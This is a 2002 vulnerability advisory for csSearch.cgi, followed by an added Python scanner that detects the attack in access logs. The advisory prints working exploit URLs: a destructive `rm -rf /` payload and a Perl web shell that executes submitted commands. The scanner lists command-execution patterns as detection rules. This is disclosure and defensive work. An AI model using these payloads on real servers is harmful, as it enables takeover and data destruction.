CGIscript.net - csSearch.cgi - Remote Code Execution (up to 17,000 sites vulnerable)
---------------------------------------------------------------------
Name      : csSearch.cgi - Remote Code Execution
Date      : March 25, 2002
Product   : csSearch
Version   : 2.3 (vulnerable)
Vuln Type : Access Validation Error
Severity  : HIGH RISK
Vendor    : WWW.CGIscript.NET, LLC.
Homepage  : http://www.cgiscript.net/

DISCUSSION:
---------------------------------------------------------------------
csSearch is a free Perl CGI search script developed by Mike Barone and Andy Angrick. According to the vendor's website (cgiscript.net), over 17,000 people have downloaded csSearch.

csSearch stores its configuration data as Perl code in a file called "setup.cgi", which the script eval()uates at runtime to load the configuration back into memory. Due to an Access Validation Error, the "savesetup" command does not check who is making the request, so any remote user can cause attacker-supplied data to be written to "setup.cgi" and therefore execute arbitrary Perl code on the server with whatever privileges the CGI script runs under. The paid version of this script, csSearch Pro, may also be vulnerable.

EXPLOIT:
---------------------------------------------------------------------
Configuration data is saved with the following URL. Note that any Perl code would need to be URL encoded.

csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE

For example, the classic "rm -rf /" example would be as follows:

csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Here is something a little more interesting: less than 300 bytes of code that turns csSearch into a remote web shell of sorts.
# Rebind csSearch's own ShowSearchForm and Login subs (via their typeglobs)
# to one closure, so every visit to the script shows a command form instead.
# Assumes csSearch stores parsed form fields in %in, as the payload relies on.
*ShowSearchForm = *Login = sub {
    print "<form method=post action=csSearch.cgi>Enter Command (eg: ls -l)<br>";
    print "<input type=text name=cmd size=99> ";
    print "<input type=submit value=Execute><hr><xmp>";
    $in{'cmd'} && print `$in{'cmd'} 2>&1`;   # run the submitted command, stderr included
    exit;
};

URL encoded as:

csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};

IMPACT:
---------------------------------------------------------------------
Because of the high number of users who have downloaded this script (over 17,000 according to cgiscript.net), and because search engines can easily be used to identify sites by the unique "csSearch.cgi" script name, the risk posed by this flaw is very high indeed.

SOLUTION:
---------------------------------------------------------------------
The vendor has released a new version, csSearch 2.5, which patches the flaw.

ISPs and web hosts may want to consider searching their servers for this script ("csSearch.cgi") and disabling it, or advising their customers of the risk, until the patched version can be installed. Since a successful attack leaves its payload in "setup.cgi", replacing csSearch.cgi alone does not necessarily remove it; inspect "setup.cgi" on any installation that was exposed for code that is not plain configuration.

DISCLAIMER:
---------------------------------------------------------------------
The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lies within the user's responsibility.

FEEDBACK:
---------------------------------------------------------------------
stegus1@yahoo.com
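The SOLUTION section tells hosts to look for the script on their servers. The following is an added example, not part of this advisory or of csSearch itself, showing the complementary check on the web-server side: scanning Apache-style access logs for "savesetup" requests, decoding the setup parameter and flagging payloads that carry Perl command-execution constructs rather than configuration assignments. The combined log format and every sample line below are assumptions constructed for this example; two of the lines carry the payloads quoted above in the EXPLOIT section.

```python
"""Scan Apache-style access logs for csSearch.cgi 'savesetup' abuse.

Added example, not code from the original advisory or from csSearch.
Assumes Apache common/combined log format; the sample lines are
constructed for this example, not captured from a real server.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log lines (Apache combined format). Lines 2 and 3 carry
# the advisory's own payloads; line 4 is a benign-looking savesetup; line 5
# shows a POST whose body (and therefore any payload) is not in the log.
SAMPLE_LOG = r'''
192.0.2.10 - - [25/Mar/2002:10:01:02 +0000] "GET /cgi-bin/csSearch.cgi?command=search&query=perl HTTP/1.0" 200 2311 "-" "Mozilla/4.0"
198.51.100.7 - - [25/Mar/2002:10:02:15 +0000] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/` HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [25/Mar/2002:10:03:44 +0000] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;}; HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [25/Mar/2002:10:05:00 +0000] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=%24title%3D%22My+Site%22%3B HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [25/Mar/2002:10:06:10 +0000] "POST /cgi-bin/csSearch.cgi HTTP/1.0" 200 900 "-" "Mozilla/4.0"
'''

# Request line is anchored on the method and the HTTP version, so quotes or
# other odd characters inside the target do not confuse the parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Perl constructs in a decoded 'setup' value that mean command execution or
# code definition rather than plain configuration assignments.
EXEC_PATTERNS = [
    (re.compile(r'`[^`]*`'), 'backtick command substitution'),
    (re.compile(r'\b(system|exec)\s*[(\s]'), 'system/exec call'),
    (re.compile(r'\bopen\s*\([^)]*\|'), 'open() with a pipe'),
    (re.compile(r'\bqx\s*[{(/]'), 'qx// command substitution'),
    (re.compile(r'\bsub\s*\{'), 'anonymous sub (code, not config data)'),
]


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode both sides.
    Done by hand rather than with parse_qs because some Python versions also
    split on ';', a character Perl payloads use heavily."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_setup(decoded):
    """Name every execution construct found in a decoded setup value."""
    return [label for pat, label in EXEC_PATTERNS if pat.search(decoded)]


def scan_log(text):
    """Return one finding per csSearch.cgi savesetup request in the log.

    Every savesetup call is reported, because in csSearch 2.3 the command
    accepts requests from anyone; 'reasons' is non-empty when the decoded
    payload contains code rather than configuration."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        if not parts.path.endswith('csSearch.cgi'):
            continue
        params = parse_query(parts.query)
        if params.get('command') != 'savesetup':
            continue
        setup = params.get('setup', '')
        findings.append({
            'ip': m.group('ip'),
            'time': m.group('ts'),
            'setup': setup,
            'reasons': classify_setup(setup),
        })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        tag = 'CODE' if f['reasons'] else 'savesetup'
        print(f"{f['time']} {f['ip']} [{tag}] {', '.join(f['reasons']) or 'no exec construct'}")
        print('    ' + f['setup'][:120])
```

Run it as-is to see the three savesetup hits from the constructed log. Two limitations matter in practice: the access log only shows query strings, so a savesetup sent in a POST body, and the cmd= POSTs that the web shell above takes afterwards, leave nothing here except a bare POST to csSearch.cgi; and a payload with no recognised construct (the "$title" line) is still a configuration write by an arbitrary client, so every hit deserves a look at "setup.cgi" on that host.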